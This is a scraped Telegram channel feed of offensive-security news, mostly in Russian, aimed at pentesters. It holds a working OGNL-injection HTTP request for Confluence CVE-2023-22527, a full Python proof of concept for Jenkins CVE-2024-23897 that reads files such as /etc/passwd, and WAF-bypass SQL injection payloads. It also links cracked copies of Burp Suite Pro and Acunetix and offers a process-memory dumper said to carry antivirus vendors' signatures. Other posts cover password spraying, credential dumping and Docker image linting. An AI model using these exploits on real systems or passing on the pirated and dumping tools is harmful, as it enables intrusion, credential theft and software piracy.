Pentester's Backlog
591 subscribers
310 photos
15 videos
44 files
425 links
Агрегатор новостей из мира наступательной безопасности.

EDUCATIONAL PURPOSES ONLY
Download Telegram
Forwarded from true_security
kldumper.exe
4 MB
утилиты для дампа памяти процесса. с подписью антивирусов avg,avast,kaspersky
3
Forwarded from SecuriXy.kz
#CVE-2023-22527 #RCE (Remote Code Execution) Vulnerability In #Confluence Data Center and Confluence Server with #CVSS v3: 10/10

Severity:
Atlassian rates the severity level of this vulnerability as critical (10.0 with the following vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) per our internal assessment.
This is our assessment, and you should evaluate its applicability to your own IT environment.

Affected Versions:
This RCE (Remote Code Execution) vulnerability affects out-of-date Confluence Data Center and Server 8 versions released before Dec. 5, 2023 as well as 8.4.5 which no longer receives backported fixes in accordance with our Security Bug Fix Policy. Atlassian recommends patching to the latest version.

Note: 7.19.x LTS versions are not affected by this vulnerability

Product
Confluence Data Center and Server

Affected Versions
8.0.x
8.1.x
8.2.x
8.3.x
8.4.x
8.5.0-8.5.3

https://www.opencve.io/cve/CVE-2023-22527

https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html

PoC: https://github.com/Avento/CVE-2023-22527_Confluence_RCE
🫡21
Forwarded from Pwn3rzs
Acunetix Windows v24.1 - 11 Jan 2024

Download
: https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.1.240111130-Windows-Pwn3rzs-CyberArsenal.rar
Password: Pwn3rzs

Changelog:
Too long for a post, refer here:
https://www.acunetix.com/changelogs/acunetix-premium/v24-1-11-january-2024/


Enjoy!
💅21
Forwarded from RedTeam brazzers (Pavel Shlundin)
Недавно на пентесте столкнулся с ситуацией, когда надо поспреить пользователей, а на руках есть вывод Ldapdomaindump. Вроде кажется, что задача простая, но есть нюансы:
1. В домене около 30к пользователей;
2. Большинство пользователей отключены, т.к. уволенных сотрудников не удаляют из домена;
3. В группе Protected Users около 600 пользователей (да, бывает и такое);
4. 8к пользователей используют smart-cards им пароли нет смысла спреить;
5. И самое жёсткое - это наличие большого количества сервисных учетных записей, к которым применяется FGPP (гранулированная парольная политика), которая при вводе хотя бы 1 неправильного пароля - блокирует учетную запись (Немного спорное решение, пишите в комментарии как к нему относитесь).
Таким образом, если заранее не подготовить список пользователей, то как минимум можно нарваться на долгий спрей по 30к пользователям, а как максимум залочить все сервисные учетные записи, которые не используют GMSA.
Под этот проект я накидал небольшой скрипт на питоне, который позволил отсеять 70% учетных записей и сократить список пользователей для спрея до 7800. После этого спрей дал результаты. В приложении скрипт (прошу не судить строго).
Forwarded from RedTeam brazzers (Pavel Shlundin)
parse_domain_users
1.1 KB
Channel photo updated
Список бесплатных ChatGPT-ботов для программирования

▫️https://www.blackbox.ai/

😎👍 САЙТ | ВК | TLG
🕵️‍♂️ ЧАТ-БОТ 🪪 ВИЗИТКА
🤝2
Forwarded from PurpleBear (Vadim Shelest)
Детали уязвимости CVE-2023-22527 (оценка по CVSS3.0=10), позволяющей получить RCE в Atlassian Confluence известны уже пару дней, но не все почему-то спешат обновлять свои сервера. 🤷‍♂️

Согласно данным Censys, которые обновляются ежедневно в отношении всего пространства IPv4, в нашей стране на сегодняшний день~3.6k скомпрометированных торчащих в интернет серверов Confluence. Технические детали уязвимости опубликованы в блоге ProjectDiscovery, эксплуатация позволяет не аутентифицированному злоумышленнику получить возможность исполнения произвольного кода путем SSTI инъекции OGNL (Object-Graph Navigation Language)

POST /template/aui/text-inline.vm HTTP/1.1
Host: сonfluence:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 285

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))


⚙️POC: https://github.com/VNCERT-CC/CVE-2023-22527-confluence
🪲Уязвимые версии ПО: 8.0.x - 8.5.3
Рекомендации: Патч уже доступен, необходимо ASAP обновиться до версии 8.5.3

#confluence #CVE-2023-22527
1
Forwarded from burpsuite (not official)
burpsuite_pro_v2023.12.1.2.zip
686 MB
pass: 311138

README (en+ru) included, plz read it before run BS.

Happy Hacking! 🥳

Run with Java 18 (JDK for Win included)

+BurpBountyPro_v2.7.0
1
Forwarded from The Hacker News
🚨 Urgent: Critical Jenkins RCE vulnerability (CVE-2024-23897) discovered.

Hackers can remotely control your CI/CD pipelines. Patch immediately to prevent malicious code in builds.

Details here: https://thehackernews.com/2024/01/critical-jenkins-vulnerability-exposes.html
🫡21
Forwarded from Похек (Sergey Zybnev)
Jenkins RCE CVE-2024-23897

Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.

PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys

if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()

data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())

print(f'REQ: {data_bytes}\n')

def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')

def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)

t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)

t1.start()
time.sleep(0.1)
t2.start()

t1.join()
t2.join()


Использование:
python poc.py http://127.0.0.1:8888/ [/etc/passwd]


🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21
Промо-VPS по 109 рублей/мес. не желаете?

Aeza может!
1
Forwarded from SHADOW:Group
​​💉 Про обход защиты от SQL-инъекций

Часто WAF на сайте душит все попытки провести SQL-инъекцию и не дает нормально воткнуть кавычку и вставить привычный пэйлоад, однако, нехитрыми манипуляциями все же частенько его можно обойти.

Например, добавив управляющие символы , типа %00, %0A и др. или вставив математические операции ('AND'1'=1*1 вместо 'AND'1'='1') или добавив специфичные комментарии типа /*!50000%55nIoN*/ /*!50000%53eLeCt*/ и многое другое.

Еще больше примеров, вы можете найти в этом репозитории, где приведены варианты байпасса для различных ситуаций, а также крайне рекомендую этот сайт.

#web #sqli #bypass #waf
Please open Telegram to view this post
VIEW IN TELEGRAM
2
Web tools, или с чего начать пентестеру?
https://habr.com/ru/companies/dsec/articles/452836/
Forwarded from PWN AI
👋.

Машинно-генерируемый код .. его так много и все мы с вами понимаем что он небезопасен.

Но можно ли заставить машину искать небезопасный код?

И вы можете сказать - мол "вставлю в гпт, попрошу - 'перепиши безопасно' " - но к сожалению так не заработает ...

🤔 Почему ? - Модель обучалась на данных, которые не имеют отношение к безопасной разработке. Более того, к сожалению, нету в реальном мире LLM, которая обучалась бы на безопасном коде...

В этом посте, я хочу с вами поделиться инструментом, который использует машинное обучение и помогает прогнозировать и обнаруживать уязвимости в коде (написанном или который пишется) на крестах(c++) .. да-да если есть такое для питона, то пришлите в комментариях.

В общем, AIBughunter - это дополнение, которое может быть интегрировано в vscode. Обучали его на данных из NVD.

В чём его плюсы для плюсов:

Он умеет прогнозировать в real-time уязвимости которые вы можете допустить и предлагает вам как их исправить.

Более того, если он обнаружил недостаток - то сразу появляется линк на CWE, а также severity.

Последний коммит расширения произошёл в прошлом году, однако разработчики не забросили проект - даже недавно написали paper по нему.

[демо-видос]

#аппсековое #code
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from SecuriXy.kz
Теперь можно извлекать учетные данные без обращения к диску (Dumping credentials without touching disk) с помощью утилиты #go-secdump которая поддерживает и SOCKS Proxy решая проблему #Impacket

https://github.com/jfjallid/go-secdump

скоро и в Impacket запилят и будет красота
https://github.com/fortra/impacket/pull/1698
Forwarded from Cult Of Wire
Для проверки Docker-образов на уязвимости есть хороший инструмент - Trivy. Сам использую и другим советую. Но сейчас не про него. Trivy хоть и хороший инструмент, но покрывает только поиск уязвимостей.

Trivy неплохо дополняет другой инструмент - Dockle.
Dockle это security linter, который проверяет Dockerfile на уязвимости (Dockle Checkpoints for Docker и Dockle Checkpoints for Linux), помимо этого проверяет и на соответствие Dockerfile Best practices и рекомендациям CIS Docker Benchmarks.

В использовании Dockle довольно прост, так как это одиночный бинарник. Так же есть пакеты для установки под популярные системы.

Можно запустить и в Docker без установки:
VERSION=$(
curl --silent "https://api.github.com/repos/goodwithtech/dockle/releases/latest" | \
grep '"tag_name":' | \
sed -E 's/.*"v([^"]+)".*/\1/' \
) && docker run --rm -v /var/run/docker.sock:/var/run/docker.sock \
goodwithtech/dockle:v${VERSION} goodwithtech/dockle-test:v2


Или так:
export DOCKLE_LATEST=$(
curl --silent "https://api.github.com/repos/goodwithtech/dockle/releases/latest" | \
grep '"tag_name":' | \
sed -E 's/.*"v([^"]+)".*/\1/' \
)

docker run --rm goodwithtech/dockle:v${DOCKLE_LATEST} goodwithtech/dockle-test:v2


Кроме того есть возможность вывод отчёта в json файл c помощью -f json -o report_name.json:
dockle -f json -o dockle_report.json goodwithtech/dockle-test:v2


В контейнере можно сделать так:
VERSION=$(
curl --silent "https://api.github.com/repos/goodwithtech/dockle/releases/latest" | \
grep '"tag_name":' | \
sed -E 's/.*"v([^"]+)".*/\1/' \
) && docker run --rm -v /var/run/docker.sock:/var/run/docker.sock \
goodwithtech/dockle:v${VERSION} -f json goodwithtech/dockle-test:v2 > dockle_report.json


Dockle легко интегриуется в CI/CD и с DefectDojo.

Из незначительных минусов могу отметить то, что Dockle не умеет сканировать Dockerfile, но для этого есть hadolint, хоть он и менее информативен.